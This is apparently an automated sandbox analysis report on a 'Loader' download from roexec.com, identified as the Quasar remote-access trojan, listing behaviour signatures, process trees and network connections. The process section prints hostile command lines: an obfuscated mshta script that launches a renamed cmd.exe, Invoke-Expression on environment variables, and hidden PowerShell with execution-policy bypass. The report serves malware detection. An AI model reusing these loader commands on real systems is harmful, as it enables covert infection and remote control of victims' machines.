Analysis Overview
Threat Level: Known bad
The file https://roexec.com/download/ was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Executes dropped EXE
Drops file in Windows directory
Enumerates physical storage devices
NTFS ADS
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-14 22:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-14 22:36
Reported
2024-03-14 22:41
Platform
win11-20240221-en
Max time kernel
149s
Max time network
188s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3594324687-1993884830-4019639329-1000\{F2BBA89A-65B8-4FAE-B0BD-243481460955} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Loader.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://roexec.com/download/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9af3b3cb8,0x7ff9af3b3cc8,0x7ff9af3b3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1336 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1980 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7012 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Loader.zip\Loader\Enjoy.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Loader\Loader\Loader.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:ZJTIOSSEPb; "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7472 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-zkGLsfyYwgpnqYSkdTvz4312:hibytKde=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,2996718755186072576,4365962123132613585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-zkGLsfyYwgpnqYSkdTvz4312:hibytKde=%
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:aXOgUWVddS; "
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roexec.com | udp |
| US | 172.67.184.90:443 | roexec.com | tcp |
| US | 172.67.184.90:443 | roexec.com | tcp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 192.0.76.3:443 | stats.wp.com | tcp |
| US | 192.0.76.3:443 | stats.wp.com | tcp |
| US | 8.8.8.8:53 | pixel.wp.com | udp |
| US | 8.8.8.8:53 | 90.184.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.76.0.192.in-addr.arpa | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | tcp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.226:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.212.193:443 | tpc.googlesyndication.com | udp |
| GB | 92.123.128.133:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.128.133:443 | r.bing.com | tcp |
| GB | 92.123.128.133:443 | r.bing.com | tcp |
